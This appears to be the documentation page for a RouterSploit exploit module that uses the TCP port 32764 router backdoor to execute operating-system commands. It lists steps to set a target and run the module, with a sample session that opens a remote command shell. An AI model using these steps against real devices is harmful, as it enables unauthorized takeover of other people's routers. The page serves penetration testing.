tcp_32764_rce.md 856 Bytes

Description

Module exploits backdoor functionality that allows executing commands on operating system level.

Verification Steps

  1. Start ./rsf.py
  2. Do: use exploits/routers/multi/tcp_32764_rce
  3. Do: set target [TargetIP]
  4. Do: run
  5. If device is vulnerable it is possible to execute commands on operating system level.

Scenarios

rsf > use exploits/routers/multi/tcp_32764_rce
rsf (TCP-32764 RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TCP-32764 RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > echo test
[*] Executing 'echo test' on the device...
[*] Connection established
test
cmd >